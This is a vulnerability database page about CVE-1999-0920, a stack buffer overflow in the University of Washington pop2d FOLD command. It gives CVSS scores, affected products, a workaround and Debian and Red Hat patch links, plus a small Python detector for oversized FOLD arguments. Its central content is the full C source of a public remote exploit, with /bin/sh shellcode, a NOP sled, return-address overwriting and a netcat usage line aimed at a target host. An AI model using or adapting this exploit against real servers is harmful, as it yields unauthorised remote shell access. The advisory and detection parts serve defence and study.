CVE-1999-0920
CVSS 10.0
Published: 1999-05-26 00:00:00
Revised: 2008-09-09 08:36:10
NMCOE

[Original] Buffer overflow in the pop-2d POP daemon in the IMAP package allows remote attackers to gain privileges via the FOLD command.


[CNNVD] UW pop2d FOLD Command Remote Buffer Overflow Vulnerability (CNNVD-199905-048)

pop2d is an open-source POP server implemented by the University of Washington.
pop2d 4.4 and earlier contain a buffer overflow vulnerability; a malicious remote attacker can exploit it to obtain the privileges of the host's "nobody" user.
The pop2 and pop3 servers support an "anonymous proxy", through which a remote user can instruct them to open an IMAP mailbox on another server where the user holds a valid account. Once logged in, an argument to the FOLD command triggers a stack-based buffer overflow.

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:university_of_washington:pop2d
cpe:/a:university_of_washington:imap:4.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0920
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0920
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-048
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/283
(UNKNOWN) BID 283

- Vulnerability information

UW pop2d FOLD Command Remote Buffer Overflow Vulnerability
Critical; boundary condition error
1999-05-26 00:00:00 2005-05-02 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily disable the pop2d service
Comment out the ipop2d line in /etc/inetd.conf:
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
then restart the inetd service.
Vendor patches:
Debian
------
The vendor has released an update to fix this security issue; download it from the vendor's site:
Source archives:
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.diff.gz
MD5 checksum: 606f893869069eee68f4c1e31392af29
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.dsc
MD5 checksum: 93ed80a3619586ff9f3246003aca2448
http://security.debian.org/dists/stable/updates/source/imap_4.5.orig.tar.gz
MD5 checksum: 59afe4be5fcd17c20d241633a4a3d0ac
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/c-client-dev_4.5-0slink2_sparc.deb
MD5 checksum: 2de5363a3ea9f27c1aa064c3102567cc
http://security.debian.org/dists/stable/updates/binary-sparc/imap_4.5-0slink2_sparc.deb
MD5 checksum: 87638b6ad06094f30ff6d2dddfd10b8b
http://security.debian.org/dists/stable/updates/binary-sparc/ipopd_4.5-0slink2_sparc.deb
MD5 checksum: aa6621e2f7e2df751489c397e9e169a8
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/c-client-dev_4.5-0slink2_i386.deb
MD5 checksum: fd92656c7281a4d8322b6da1285475cd
http://security.debian.org/dists/stable/updates/binary-i386/imap_4.5-0slink2_i386.deb
MD5 checksum: c92eaece7e431c84708909362afad07d
http://security.debian.org/dists/stable/updates/binary-i386/ipopd_4.5-0slink2_i386.deb
MD5 checksum: 29685847b0eef8307383a428b1d02be2
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/c-client-dev_4.5-0slink2_m68k.deb
MD5 checksum: eeab449299e9f2d3fc97db69110b4432
http://security.debian.org/dists/stable/updates/binary-m68k/imap_4.5-0slink2_m68k.deb
MD5 checksum: 4bd0fbaa392b6013f6caa33b04578764
http://security.debian.org/dists/stable/updates/binary-m68k/ipopd_4.5-0slink2_m68k.deb
MD5 checksum: d43f502971afc531923903f3ac7b5b3f
Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/c-client-dev_4.5-0slink2_alpha.deb
MD5 checksum: 6732ae9495ee29590ed85cc482fbda97
http://security.debian.org/dists/stable/updates/binary-alpha/imap_4.5-0slink2_alpha.deb
MD5 checksum: d0ee05b972d5d1bc1d066e2bae4d8c8b
http://security.debian.org/dists/stable/updates/binary-alpha/ipopd_4.5-0slink2_alpha.deb
MD5 checksum: 89c3931092537d0eb23fb50fa57f1bb0
RedHat
------
The vendor has released an update to fix this security issue; download it from the vendor's site:
Red Hat Linux 4.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/imap-4.5-0.4.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/imap-4.5-0.4.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/imap-4.5-0.4.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/4.2/SRPMS/imap-4.5-0.4.2.src.rpm
Red Hat Linux 5.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/imap-4.5-0.5.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/imap-4.5-0.5.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/5.2/SRPMS/imap-4.5-0.5.2.src.rpm

- Vulnerability information (19226)

University of Washington pop2d 4.4 Buffer Overflow Vulnerability (EDBID:19226)
linux remote
1999-05-26 Verified
0 Chris Evans
N/A
source: http://www.securityfocus.com/bid/283/info

A buffer overflow vulnerability in pop2d version 4.4 or earlier allows malicious remote users to obtain access to the "nobody" user account.

The pop2 and pop3 servers support the concept of an "anonymous proxy", whereby a remote user connecting to the server can instruct it to open an IMAP mailbox on some other server they have a valid account on. In this state the pop2 server runs under the "nobody" user id.

Once logged on, issuing a FOLD command with an argument of about 1000 bytes will cause a stack based buffer overflow.
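As an added detection example (not from the page or from the exploit's author), the parser below walks a constructed POP2 command transcript and flags the two events described above: a proxied HELO login of the "host:user pass" form, which is the code path that runs as "nobody", and a FOLD argument far longer than any real folder name. The sample lines and the 256-byte threshold are assumptions.

```python
import re
from typing import List, Tuple

# Constructed POP2 client-command transcript (not captured from a real host).
# The last FOLD line mimics the ~1000-byte argument the advisory describes.
SAMPLE_SESSION = [
    "HELO alice smoke",
    "FOLD INBOX",
    "READ",
    "HELO mail.example.org:bob hunter2",
    "FOLD " + "A" * 1000,
    "QUIT",
]

# Legitimate folder names are short; the 256-byte limit is an assumed
# detection threshold, not a value taken from the page.
FOLD_LIMIT = 256

# POP2 verbs are four letters, optionally followed by one argument string.
POP2_CMD = re.compile(r"^([A-Za-z]{4})(?:\s(.*))?$")


def parse_pop2_command(line: str) -> Tuple[str, str]:
    """Split one POP2 command line into (verb, argument)."""
    m = POP2_CMD.match(line.rstrip("\r\n"))
    if not m:
        return ("", line)
    return (m.group(1).upper(), m.group(2) or "")


def find_suspicious(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, reason) for events worth alerting on."""
    findings = []
    for n, line in enumerate(lines, 1):
        verb, arg = parse_pop2_command(line)
        if verb == "HELO" and ":" in arg.split(" ", 1)[0]:
            # "host:user pass" selects the anonymous proxy, i.e. the
            # server state in which a later FOLD is handled as "nobody".
            findings.append((n, "anonymous-proxy login"))
        elif verb == "FOLD" and len(arg) > FOLD_LIMIT:
            findings.append((n, f"oversized FOLD argument ({len(arg)} bytes)"))
    return findings


if __name__ == "__main__":
    for lineno, reason in find_suspicious(SAMPLE_SESSION):
        print(f"line {lineno}: {reason}")
```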

/*
 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 *
 * by c0nd0r <condor@sekure.org>
 *
 *  (read the instructions below)
 *
 *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
 *            also to #uground (irc.brasnet.org) and #SDI (efnet),
 *            guys at el8.org, toxyn.org, pulhas.org
 *
 *  Sincere Apologizes: duke (for the mistake we made with the wu-expl),
 *                     your code rocks.
 *
 *  Usage:
 *
 *    SDI-pop2 <imap_server> <user> <pass> [offset]
 *
 *   where  imap_server = IMAP server at your box (or other place as well)
 *          user = any account at your box
 *          pass = the account's password
 *          offset = 0 is default -- increase if it's necessary.
 *
 *  Example: (netcat rocks)
 *
 *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *
 *  ----------------------------------------------------------------
 *  HOWTO-exploit:
 *
 *   In order to gain remote access as user nobody, you should set
 *   an IMAP server at your box (just edit the inetd.conf) or at
 *   any other machine which you have an account.
 *
 *   During the anonymous_login() function, the ipop2d will set the
 *   uid to user nobody, so you are not going to get a rootshell.
 *  ----------------------------------------------------------------
 *
 *  We do NOT take any responsability for the consequences of using
 *  this code -- you've been warned! don't be a script k1dd13!
 *
 */


#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* sleep() */

/*
 *  (shellcode)
 * 
 *       jmp   0x1f
 *       popl  %esi
 *       movl  %esi,0x8(%esi)
 *       xorl  %eax,%eax
 *       movb  %eax,0x7(%esi)
 *       movl  %eax,0xc(%esi)
 *       movb  $0xb,%al
 *       movl  %esi,%ebx
 *       leal  0x8(%esi),%ecx
 *       leal  0xc(%esi),%edx
 *       int   $0x80
 *       xorl  %ebx,%ebx
 *       movl  %ebx,%eax
 *       inc   %eax
 *       int   $0x80
 *       call  -0x24
 *       .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org
 */

char c0d3[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
 

int main (int argc, char *argv[] ) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 char host[255], user[255], pass[255];
 int bsize=986;
 
 if ( argc < 4) {
  printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  printf ( "usage:\n(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  exit (0);
 }
  
 snprintf ( host, sizeof(host), "%s", argv[1]);
 snprintf ( user, sizeof(user), "%s", argv[2]);
 snprintf ( pass, sizeof(pass), "%s", argv[3]);
 
 if ( argc > 4) offset = atoi ( argv[4]);
 /* gimme the ret + offset */
 addr = 0xbffff3c0 + offset; 
 fprintf ( stderr, "0wning data since 0x%lx\n\n", addr);
 
 /* calculation of the return address position */
 bsize -= strlen ( host);
 
 for ( x = 0; x < bsize-(int)strlen(c0d3); x++)
  buf[x] = 0x90;
 
 for ( y = 0; y < (int)strlen(c0d3); x++, y++)
  buf[x] = c0d3[y]; 
 
 for (  ; x < 1012; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }
 buf[x] = '\0';  /* terminate so printf("%s") stops at the end of buf */
        
 sleep (1);
 printf ( "HELO %s:%s %s\r\n", host, user, pass);
 sleep (1);
 printf ( "FOLD %s\r\n", buf);

 return 0;
}


- Vulnerability information

104
IMAP pop-2d POP Daemon FOLD Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1999-05-26 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's respective websites.